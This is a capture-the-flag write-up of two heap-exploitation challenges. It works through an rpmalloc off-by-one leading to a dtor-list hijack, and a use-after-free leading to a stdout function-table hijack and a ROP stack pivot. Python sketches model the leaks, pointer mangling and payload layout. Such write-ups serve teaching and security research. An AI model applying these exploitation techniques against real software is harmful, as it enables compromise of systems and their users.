I'm finally making my own ctf competition!
I wanted to make sure that my registration system is safe and since I know from past ctf experience that glibc malloc is very easy to exploit; I decided to use a different allocator :)
entering 69 as an option prints out the following string
which hints at the different allocator that the author mentioned in the description.
as I'm unfamiliar with the implementation, I googled for details and for any known attack techniques specific to rpmalloc, but found nothing until I stumbled upon this llvm page
at first glance it seems to be an exact copy of the repo; I skimmed it anyway, and this part is really interesting
Quick overview
it mentions another allocator developed by Google, tcmalloc, which is similar to rpmalloc, with the following difference:
Unlike tcmalloc, single blocks do not flow between threads, only entire spans of pages
since I failed to find any information on rpmalloc's implementation details, I switched to looking for the implementation details of tcmalloc instead, which led me to this page
I also found this writeup of a challenge that involves tcmalloc as well
an interesting quote from it:
tcmalloc doesn't do any security check, fake any pointers can do the magic.
which makes it easier to hijack freelist pointers, and I assumed the same would hold for rpmalloc.
now let's get back to the challenge binary: we can only create and read allocations, with no way to free them
typedef struct {
    long age;
    char name[8];
    char desc[32];
} hacker;

void register_hacker(void)
{
    hacker *chunk;
    ulong i;

    /* find the first empty slot in the global pointer array */
    for (i = 0; hackers[i] != (hacker *)0x0; i = i + 1) {
    }
    if (i < 100) {
        chunk = (hacker *)malloc(0x30);
        printf("How old is the hacker? ");
        /* age is left untouched if the conversion fails */
        __isoc99_scanf("%lu",chunk);
        getchar();
        printf("What\'s the hacker\'s name ? ");
        __isoc99_scanf("%16[^\n]s",chunk->name);
        getchar();
        printf("How would you describe this hacker ? ");
        /* up to 32 characters plus a terminating NUL: 33 bytes into desc[32] */
        __isoc99_scanf("%32[^\n]s",chunk->desc);
        getchar();
        hackers[i] = chunk;
        printf("Your hacker number is %zu !\n",i);
    }
    else {
        puts("Sorry ! No spots left :/");
    }
    return;
}

void read_hacker(void)
{
    ulong i;
    hacker *chunk;

    printf("What is the hacker\'s number ? ");
    __isoc99_scanf("%zu",&i);
    getchar();
    if (i < 100) {
        if (hackers[i] == (hacker *)0x0) {
            printf("Sorry, but no hacker is registered as number %zu...\n",i);
        }
        else {
            chunk = hackers[i];
            puts("========================= HACKER ========================");
            printf("Name: %s\n",chunk->name);
            printf("Age: %lu\n",chunk->age);
            printf("Description: %s\n",chunk->desc);
            puts("=========================================================");
        }
    }
    else {
        puts("Invalid index.");
    }
    return;
}
note:
allocations have a fixed size of 0x30
allocations are stored in an array of pointers
there's a limit of 100 allocations
to further understand the structure of the heap, I allocated two chunks and here's what we have
note:
the order of the freelist is not randomised
freelist pointers are stored at the beginning of each chunk
Vulnerability
with the off-by-one, we can corrupt the adjacent chunk's freelist pointer to create overlapping chunks, then overwrite the freelist and control the next allocation, essentially pivoting within the heap.
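to make the off-by-one concrete, here is a small Python model of two adjacent 0x30-byte chunks (a sketch, not the exploit itself). it assumes the decompiled layout is accurate (age at +0x0, name at +0x8, desc at +0x10) and that `%32[^\n]` stores up to 32 characters followed by a terminating NUL; the pointer value is made up for illustration.

```python
import struct

CHUNK_SIZE = 0x30      # malloc(0x30) in register_hacker
DESC_OFFSET = 0x10     # age (8 bytes) + name (8 bytes), per the decompiled struct
DESC_WIDTH = 32        # field width in "%32[^\n]"


def scanf_desc(heap: bytearray, chunk_off: int, line: bytes) -> None:
    """Model of scanf("%32[^\\n]", chunk->desc): copy up to 32 bytes, then a NUL."""
    data = line.split(b"\n", 1)[0][:DESC_WIDTH]
    start = chunk_off + DESC_OFFSET
    heap[start:start + len(data)] = data
    heap[start + len(data)] = 0  # terminator; lands at chunk offset 0x30 when len == 32


# Two adjacent chunks; the second one is still free and holds a freelist pointer.
heap = bytearray(2 * CHUNK_SIZE)
fake_next = 0x7F0000001110                      # hypothetical freelist pointer
struct.pack_into("<Q", heap, CHUNK_SIZE, fake_next)

scanf_desc(heap, 0, b"A" * 32 + b"\n")          # full-width description
corrupted = struct.unpack_from("<Q", heap, CHUNK_SIZE)[0]
print(hex(fake_next), "->", hex(corrupted))
```

in this model the only byte written outside the first chunk is the NUL, which clears the least significant byte of the neighbouring chunk's first qword.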
Exploitation
Heap leak
the freelist's *next pointer occupies the same bytes as the age field of the hacker structure, which is read using
__isoc99_scanf("%lu",chunk);
a trick to skip the numeric read and preserve the existing value is to input a lone +: scanf consumes the sign, finds no digits, and fails the conversion without writing to age. the freelist pointer is thus preserved and we can leak a heap address from it
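the read side of the leak can be sketched as follows. `parse_age_leak` is a hypothetical helper name, and the transcript is invented; only the `Age: %lu` line format comes from the decompilation of read_hacker.

```python
import re


def parse_age_leak(output: bytes) -> int:
    """Extract the number printed by 'Age: %lu' in read_hacker's output."""
    match = re.search(rb"^Age: (\d+)$", output, re.MULTILINE)
    if match is None:
        raise ValueError("no 'Age:' line in output")
    return int(match.group(1))


# Invented transcript: age was skipped with "+", so it still holds a pointer.
sample = (
    b"========================= HACKER ========================\n"
    b"Name: AAAA\n"
    b"Age: 139637976731872\n"
    b"Description: BBBB\n"
    b"=========================================================\n"
)
heap_leak = parse_age_leak(sample)
print(hex(heap_leak))
```

since the value is printed as an unsigned decimal, the whole 8-byte pointer comes back regardless of embedded NUL bytes.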
TLC & TLS leak
at this point, I had no idea whether there was even a libc address within the heap region, so I figured we needed to leak other addresses or structures.
I noticed that our first allocation always starts at an offset of 0x80, which is not page aligned. this made me theorize that there might be some structure before it that holds useful addresses.
and I was right
the structure holds a pointer to memory that in turn contains a pointer to the Thread Local Storage (TLS). because of this, I just call that structure the Thread Local Cache (TLC)
to leak it, we trigger the off-by-one to partially overwrite the adjacent chunk's freelist pointer, as best explained by the following diagram and code
subsequently, we also use + on the 6th allocation to preserve the TLC address, which then becomes our next freelist entry, pivoting the heap once more.
this pattern of pivoting in the heap is repeated over the course of the exploit
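the arithmetic behind the partial overwrite is simply clearing the low byte of a little-endian pointer. the sketch below assumes a span whose chunks start at +0x80 and are 0x30 apart, with each free chunk's next pointer aimed at the following chunk; the base address is hypothetical and the chunk actually targeted in the exploit may differ.

```python
CHUNK_SIZE = 0x30
FIRST_CHUNK_OFFSET = 0x80   # offset of the first allocation, as observed above


def clear_low_byte(ptr: int) -> int:
    """Result of a single NUL byte landing on the least significant byte."""
    return ptr & ~0xFF


span_base = 0x7F0000001000  # hypothetical address of the structure before the chunks
for i in range(4):
    chunk = span_base + FIRST_CHUNK_OFFSET + i * CHUNK_SIZE
    next_ptr = chunk + CHUNK_SIZE   # assumed: next points at the following chunk
    print(f"chunk {i}: next {next_ptr:#x} -> {clear_low_byte(next_ptr):#x}")
```

under these assumptions, next pointers that still live in the first 0x100 bytes of the span collapse onto the span base, which is where the structure in front of the first chunk sits.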
Libc leak
in those regions we still hadn't seen any addresses that point into libc, so I wanted to know what these addresses are adjacent to in the virtual memory map.
it turned out that they are adjacent to ld's mappings and contiguous with them
this way, we can pivot to ld's GOT, which contains libc function pointers
you can also try pwndbg's built-in leakfind command, which is what I initially used to check whether there's a libc pointer within the heap.
Hijack DTOR list
to get a shell, I took advantage of the fact that we already have a TLS leak, rather than using ROP, which would require further steps.
at this point we can hijack either the exit handlers or the dtor list. I chose the latter because it's more convenient: it only requires a write primitive into the TLS region, whereas the former requires a read from the TLS region and then a write into the libc region.
to execute it, we essentially need two writes:
nullify the pointer guard
overwrite the dtor list
such that the following will be satisfied
as of libc 2.35 the offset of the list is 0x60 from the TLS; however, this might change, and you can debug it by stepping through the instructions of __call_tls_dtors as the program exits.
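the two writes can be sketched in Python as below. on x86-64, glibc mangles the stored function pointer by xoring it with the pointer guard and rotating left by 0x11, and __call_tls_dtors undoes this before calling func(obj). with the guard zeroed, only the rotation remains. the helper names and the two addresses are placeholders, not values from the real exploit.

```python
import struct

MASK64 = (1 << 64) - 1


def rol64(value: int, bits: int) -> int:
    bits %= 64
    return ((value << bits) | (value >> (64 - bits))) & MASK64


def ror64(value: int, bits: int) -> int:
    bits %= 64
    return ((value >> bits) | (value << (64 - bits))) & MASK64


def ptr_mangle(ptr: int, guard: int = 0) -> int:
    """PTR_MANGLE on x86-64: xor with the pointer guard, then rol 0x11."""
    return rol64(ptr ^ guard, 0x11)


def ptr_demangle(ptr: int, guard: int = 0) -> int:
    """PTR_DEMANGLE on x86-64: ror 0x11, then xor with the pointer guard."""
    return ror64(ptr, 0x11) ^ guard


def fake_dtor_list(func: int, obj: int) -> bytes:
    """struct dtor_list { func, obj, map, next }, with map and next left NULL."""
    return struct.pack("<QQQQ", ptr_mangle(func), obj, 0, 0)


SYSTEM = 0x7F0000050D70   # placeholder for the leaked address of system
BINSH = 0x7F00001D8678    # placeholder for the address of a "/bin/sh" string
entry = fake_dtor_list(SYSTEM, BINSH)
print(entry.hex())
```

the map field is only dereferenced after func returns, so leaving it NULL is fine as long as the called function never comes back.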
here's the exploit being run against the remote server
we're given a single binary named freemyman; here's some information about it
└──╼ [★]$ file freemyman
freemyman: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, for GNU/Linux 2.4.0, with debug_info, not stripped
└──╼ [★]$ pwn checksec freemyman
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
upon adding a new request we're able to fill in 2 input fields: title and content.
with no size prompt, it can be deduced that the size is hard coded; as can be seen from the decompilation, it is hard coded to 0x90
notice there are also two add options, add request and add data. as far as I understand, there's no difference between them other than that they're kept in different pools and have different counters.
also, unlike requests, data entries cannot be edited, shown or deleted. other than that, they're practically the same (I'm assuming a lot here)
I did read a bit more of the decompilation, but not thoroughly, as it's not the prettiest, or at least I'm not familiar enough to reverse it
I played around with it to familiarize myself with the chunk structure a bit more. I allocated two chunks and here's what we got
then I freed those two chunks, index 1 first and then index 2
as can be seen, the freed chunks form a doubly linked list, with pointers that seemingly point to the address at an offset of -0x8.
also notice how our input's starting address is not 8-byte aligned: for example, the title field starts at +0x1 while content is at +0x52.
I did a few more trials and it seems that the byte right before each input is its length, recording how long the input to that specific field is. this would prove to be very annoying at a later stage.
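a minimal model of that layout shows why the length byte gets in the way. it assumes a 0x90-byte chunk with length bytes at +0x0 and +0x51 (so the text starts at +0x1 and +0x52, as observed); `write_field` is a hypothetical helper, not a function from the binary.

```python
TITLE_LEN_OFFSET = 0x00     # length byte; title text starts at +0x1
CONTENT_LEN_OFFSET = 0x51   # length byte; content text starts at +0x52
CHUNK_SIZE = 0x90


def write_field(chunk: bytearray, len_offset: int, data: bytes) -> None:
    """Store a length-prefixed field: one length byte, then the raw bytes."""
    if len(data) > 0xFF or len_offset + 1 + len(data) > len(chunk):
        raise ValueError("field does not fit")
    chunk[len_offset] = len(data)
    chunk[len_offset + 1:len_offset + 1 + len(data)] = data


chunk = bytearray(CHUNK_SIZE)
write_field(chunk, TITLE_LEN_OFFSET, b"AAAAAAAA")
write_field(chunk, CONTENT_LEN_OFFSET, b"BBBB")

# The first qword mixes the length byte with the first 7 bytes of the title.
first_qword = int.from_bytes(chunk[:8], "little")
print(hex(first_qword))
```

any 8-byte-aligned value that overlaps the start of a field has its low byte dictated by the input length, so a pointer written through that field cannot be chosen freely.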
Vulnerability
as anyone could probably have guessed, this is a UAF challenge, as the name implies. I tried to edit the chunks after they had been deleted, and we're able to do so.
this lets us partially overwrite the freelist.
Exploitation
heap pivot to arbitrary write
to hijack the freelist and pivot the heap to gain arbitrary write, we'll need to work around the partial overwrite.
the first step is to create an overlapping fake chunk using the UAF, with the *next pointer of the fake chunk pointing to the address we want, as follows:
as we reallocate the 2nd chunk, the allocator dereferences its next pointer, which points to our fake chunk, which in turn contains the address we wish to pivot to. we just have to allocate once more to recycle the overlapped chunk, and the allocation after that will land on our targeted address.
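the sequence above can be replayed on a toy allocator. this is a deliberately simplified model: a singly linked LIFO free list with no validation, whereas the real one looked doubly linked, and every address is invented.

```python
class ToyFreelist:
    """Free list whose next pointer lives in the first word of each free chunk."""

    def __init__(self) -> None:
        self.memory = {}   # address -> qword stored at that address
        self.head = 0

    def free(self, addr: int) -> None:
        self.memory[addr] = self.head
        self.head = addr

    def malloc(self) -> int:
        addr = self.head
        self.head = self.memory.get(addr, 0)   # next is trusted blindly
        return addr


heap = ToyFreelist()
chunk1, chunk2 = 0x1000, 0x1090
fake_chunk = 0x10A0     # lies inside chunk2, so the UAF edit can reach it
target = 0x600000       # hypothetical address we want malloc to return

heap.free(chunk1)
heap.free(chunk2)                   # freed in the order index 1, then 2
heap.memory[chunk2] = fake_chunk    # UAF edit: redirect chunk2's next
heap.memory[fake_chunk] = target    # the fake chunk's next is the target

allocs = [heap.malloc() for _ in range(3)]
print([hex(a) for a in allocs])
```

the first allocation returns the 2nd chunk, the second recycles the overlapping fake chunk, and the third lands on the target.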
Failed attempt
upon examining the implementation of each option, I stumbled upon this interesting piece of code
my idea here was to hijack the function pointer call. I looked for functions similar to system or execve and found this as a gadget
combined with writing /bin/sh to U_$SYSTEM_$$_OUTPUT, hopefully this would get us a shell.
first, I tried to overwrite the function pointer to make sure we can control execution, and it worked
however, I ran into multiple issues when writing to U_$SYSTEM_$$_OUTPUT. at this point I also realized that FPC_THREADVAR_RELOCATE is not unique to the challenge itself: a lot of builtin functions reference this variable as well, which makes the set of constraints quite big.
at the time of the CTF I had just got back from a trip and was very exhausted, so I stopped here until the CTF ended
Stdout flush
after the CTF ended, kileak posted their writeup and I peeked at it a little to get a hint on how to move forward
I stopped reading at the point where I got stuck; the hint was that they overwrote the U_$SYSTEM_$$_STDOUT structure and hijacked its function table, since it is flushed when the program exits.
and I managed to recreate it
I noticed that to control the execution flow we need to set up the correct gadget address at [rbx + 0x38], which is well under our control as it lies within U_$SYSTEM_$$_STDOUT. we also control R10, which is perfect for this stack pivot gadget:
0x000000000045c0d8 : xchg r10, rsp ; ret
we just need to set up our ROP payload in the heap and then load R10 with the payload address, and our ROP chain will be executed :)
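a rough sketch of how the two pieces could be laid out in Python follows. only the pivot gadget address and the 0x38 offset come from the analysis above; the other gadget addresses, the /bin/sh address and the execve-style chain are placeholders for illustration, and the buffer is assumed to start wherever rbx points.

```python
import struct

PIVOT_GADGET = 0x45C0D8   # xchg r10, rsp ; ret
HANDLER_OFFSET = 0x38     # the call target is read from [rbx + 0x38]


def p64(value: int) -> bytes:
    return struct.pack("<Q", value)


def fake_object(size: int = 0x40) -> bytes:
    """Buffer meant to sit where rbx points, with the pivot gadget at +0x38."""
    buf = bytearray(size)
    buf[HANDLER_OFFSET:HANDLER_OFFSET + 8] = p64(PIVOT_GADGET)
    return bytes(buf)


def rop_chain(words) -> bytes:
    """Pack a list of 64-bit words into the payload that R10 will point to."""
    return b"".join(p64(word) for word in words)


# Placeholder addresses; real ones would have to be found in the binary.
POP_RDI, POP_RSI, POP_RDX, POP_RAX, SYSCALL = (
    0x41414101, 0x41414102, 0x41414103, 0x41414104, 0x41414105)
BINSH = 0x42424200        # placeholder address of a "/bin/sh" string

chain = rop_chain([
    POP_RDI, BINSH,       # rdi = path
    POP_RSI, 0,           # rsi = argv (NULL)
    POP_RDX, 0,           # rdx = envp (NULL)
    POP_RAX, 59,          # rax = SYS_execve on x86-64 Linux
    SYSCALL,
])
print(fake_object().hex())
print(chain.hex())
```

once the hijacked call reaches the pivot gadget, rsp takes the value of R10 and the ret starts consuming the chain.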
The allocator is similar in spirit to tcmalloc from the Google Performance Toolkit. It uses separate heaps for each thread and partitions memory blocks according to a preconfigured set of size classes, up to 2MiB. Larger blocks are mapped and unmapped directly. Allocations for different size classes will be served from different set of memory pages, each "span" of pages is dedicated to one size class. Spans of pages can flow between threads when the thread cache overflows and are released to a global cache, or when the thread ends. Unlike tcmalloc, single blocks do not flow between threads, only entire spans of pages.
As I read more about it, I thought to myself that the implementation is very similar to the allocator used in the Linux kernel
tcmalloc also uses terms such as runs and regions, similar to another allocator's implementation that I previously encountered at the 7th Cyber Mimic Defense. the tldr of those terms can be found in the writeup below
the vulnerability here is much the same as in that challenge: it's an off-by-one caused by the scanf calls.